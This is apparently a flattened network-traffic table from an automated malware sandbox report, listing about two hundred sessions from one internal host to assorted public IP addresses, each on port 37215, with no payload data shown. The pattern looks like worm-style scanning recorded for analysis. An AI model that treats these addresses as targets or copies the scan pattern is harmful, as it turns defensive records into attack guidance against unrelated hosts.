                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8038192.168.2.133828896.70.228.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8039192.168.2.1354736197.12.248.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8040192.168.2.134788679.82.34.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8041192.168.2.1354038116.111.150.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8042192.168.2.1345928177.245.239.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8043192.168.2.1334652152.102.200.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8044192.168.2.133738041.32.228.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8045192.168.2.1335254157.32.56.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8046192.168.2.1333024157.117.224.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8047192.168.2.1355876197.23.68.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8048192.168.2.1356026157.91.180.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8049192.168.2.133287241.90.47.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8050192.168.2.1340472104.127.89.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8051192.168.2.135891865.21.85.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8052192.168.2.1357576157.178.54.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8053192.168.2.134293636.179.229.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8054192.168.2.1350244197.217.124.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8055192.168.2.1336326197.5.68.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8056192.168.2.1356374197.149.167.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8057192.168.2.1340386197.164.8.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8058192.168.2.133457241.115.224.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8059192.168.2.134509441.181.59.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8060192.168.2.1353054157.245.10.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8061192.168.2.135134641.33.100.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8062192.168.2.1340624197.66.21.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8063192.168.2.1337042221.109.4.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8064192.168.2.1333056197.197.62.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8065192.168.2.134508241.234.98.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8066192.168.2.1356080197.165.80.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8067192.168.2.1356260197.233.155.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8068192.168.2.134402841.16.253.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8069192.168.2.136079641.26.215.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8070192.168.2.1333126197.164.118.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8071192.168.2.135040241.132.246.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8072192.168.2.1337284157.50.220.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8073192.168.2.1340458157.79.38.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8074192.168.2.1360586197.79.159.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8075192.168.2.1351554157.250.217.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8076192.168.2.1359720197.209.87.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8077192.168.2.135008054.80.117.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8078192.168.2.1358580197.31.12.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8079192.168.2.1346588204.88.165.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8080192.168.2.1334572157.217.162.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8081192.168.2.1352992157.56.240.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8082192.168.2.135497420.3.237.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8083192.168.2.1346600100.0.88.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8084192.168.2.134389461.11.182.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8085192.168.2.1337060157.159.137.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8086192.168.2.1345624157.104.156.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8087192.168.2.1343150157.150.10.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8088192.168.2.1348894197.61.14.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8089192.168.2.1332964197.249.33.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8090192.168.2.1356528197.44.55.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8091192.168.2.1343034221.78.15.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8092192.168.2.1338462197.48.26.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8093192.168.2.135379241.232.72.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8094192.168.2.135657241.172.119.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8095192.168.2.135591441.46.137.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8096192.168.2.135752441.209.146.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8097192.168.2.1351600197.179.110.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8098192.168.2.1333226157.178.19.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8099192.168.2.1351516157.19.126.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8100192.168.2.134172641.30.14.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8101192.168.2.134482476.3.250.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8102192.168.2.1346906205.24.175.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8103192.168.2.1344982154.18.192.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8104192.168.2.1339710188.85.244.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8105192.168.2.1348174157.106.205.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8106192.168.2.1359926197.250.195.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8107192.168.2.1351910197.142.124.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8108192.168.2.1333450188.59.151.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8109192.168.2.1350908157.106.6.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8110192.168.2.133913618.74.157.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8111192.168.2.133525241.83.216.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8112192.168.2.1340264197.70.119.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8113192.168.2.1337636197.77.9.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8114192.168.2.133934214.63.28.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8115192.168.2.135928041.205.201.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8116192.168.2.134123641.171.186.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8117192.168.2.133852292.90.188.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8118192.168.2.135762241.38.187.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8119192.168.2.1352906118.52.63.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8120192.168.2.135541861.77.159.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8121192.168.2.1337256175.46.124.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8122192.168.2.1354226147.168.205.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8123192.168.2.135776441.2.80.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8124192.168.2.1360968197.243.72.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8125192.168.2.1350822157.116.121.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8126192.168.2.1354086197.87.106.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8127192.168.2.1355532197.85.209.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8128192.168.2.1350936213.180.129.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8129192.168.2.1354228197.157.87.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8130192.168.2.1337304197.238.38.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8131192.168.2.1359920157.203.143.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8132192.168.2.1350730184.209.67.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8133192.168.2.1347910157.94.180.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8134192.168.2.1346466223.84.12.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8135192.168.2.133808841.191.248.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8136192.168.2.1356904114.228.51.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8137192.168.2.134453041.213.151.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8138192.168.2.1359368188.180.225.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8139192.168.2.1357636197.133.93.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8140192.168.2.1359734197.39.55.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8141192.168.2.135967641.186.138.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8142192.168.2.1343820157.143.76.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8143192.168.2.1340194157.8.236.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8144192.168.2.1339570157.110.170.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8145192.168.2.1355748157.94.145.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8146192.168.2.134727041.149.17.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8147192.168.2.134827841.56.185.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8148192.168.2.1351834157.183.88.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8149192.168.2.1339802197.180.26.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8150192.168.2.1342404197.27.87.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8151192.168.2.135639241.49.17.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8152192.168.2.133539041.245.8.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8153192.168.2.1351440157.244.110.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8154192.168.2.1342910220.131.72.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8155192.168.2.1334764197.55.113.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8156192.168.2.1344716194.182.87.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8157192.168.2.1341514168.215.208.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8158192.168.2.135176652.8.137.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8159192.168.2.134088241.51.74.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8160192.168.2.1338582157.210.5.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8161192.168.2.1333938186.225.98.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8162192.168.2.1345920197.41.146.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8163192.168.2.1343460157.161.244.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8164192.168.2.1334848197.49.192.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8165192.168.2.135885241.95.173.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8166192.168.2.1332974197.200.98.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8167192.168.2.134443841.196.70.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8168192.168.2.1337654197.86.12.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8169192.168.2.1335094157.85.212.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8170192.168.2.1353584197.79.147.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8171192.168.2.133534041.75.28.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8172192.168.2.1346374197.218.247.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8173192.168.2.1351912157.48.120.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8174192.168.2.134859241.19.198.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8175192.168.2.1349918157.174.67.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8176192.168.2.134539887.119.162.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8177192.168.2.1349128197.16.45.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8178192.168.2.134869884.250.226.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8179192.168.2.134732840.39.92.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8180192.168.2.1354898163.89.53.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8181192.168.2.135797896.34.132.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8182192.168.2.1352980194.82.32.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8183192.168.2.133841858.40.51.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8184192.168.2.1353268157.228.151.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8185192.168.2.135820041.93.107.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8186192.168.2.1355574197.1.168.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8187192.168.2.1356300157.141.158.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8188192.168.2.1358670197.230.29.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8189192.168.2.1349872197.168.84.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8190192.168.2.134036641.167.197.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8191192.168.2.1345340221.111.201.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192192.168.2.1348684112.166.21.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8193192.168.2.134273241.140.233.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8194192.168.2.134239442.111.61.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8195192.168.2.1337730198.107.191.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8196192.168.2.1338662157.17.249.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8197192.168.2.134478641.181.120.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8198192.168.2.134067641.229.77.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8199192.168.2.1336076197.64.82.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8200192.168.2.135004841.147.100.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8201192.168.2.1335068157.174.215.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8202192.168.2.1346448184.77.200.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8203192.168.2.1358440157.129.27.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8204192.168.2.1348984200.126.90.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8205192.168.2.1336434197.52.148.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8206192.168.2.133966441.128.120.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8207192.168.2.1337790164.48.209.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8208192.168.2.135799241.166.131.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8209192.168.2.1346892157.253.9.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8210192.168.2.135817641.218.249.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8211192.168.2.133518041.165.145.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8212192.168.2.133794841.206.180.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8213192.168.2.1338566157.88.170.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8214192.168.2.1343544197.210.230.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8215192.168.2.1349864197.135.0.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8216192.168.2.135803041.221.76.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8217192.168.2.1336588157.88.221.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8218192.168.2.133825441.5.202.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8219192.168.2.1352860157.161.131.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8220192.168.2.1357366197.24.91.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8221192.168.2.1354862152.230.168.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8222192.168.2.1344392157.69.42.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8223192.168.2.1350796197.46.20.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8224192.168.2.134308841.30.112.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8225192.168.2.135482067.127.203.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8226192.168.2.135268092.170.117.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8227192.168.2.13361764.81.187.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8228192.168.2.133961489.86.3.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8229192.168.2.1332906197.143.92.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8230192.168.2.1340122143.134.32.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8231192.168.2.1360156157.225.170.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8232192.168.2.1350918159.165.32.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8233192.168.2.1340518157.4.142.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8234192.168.2.1343774197.243.38.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8235192.168.2.1351080213.177.186.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8236192.168.2.135988041.153.151.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8237192.168.2.1347816197.32.94.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8238192.168.2.135512841.155.22.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8239192.168.2.133447641.135.186.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8240192.168.2.134465241.23.225.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8241192.168.2.133504841.9.120.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8242192.168.2.134219641.13.157.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8243192.168.2.1356026197.164.98.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8244192.168.2.1353894197.191.242.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8245192.168.2.1339470157.35.97.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8246192.168.2.134360441.247.207.10537215
                                                  TimestampBytes transferredDirectionData


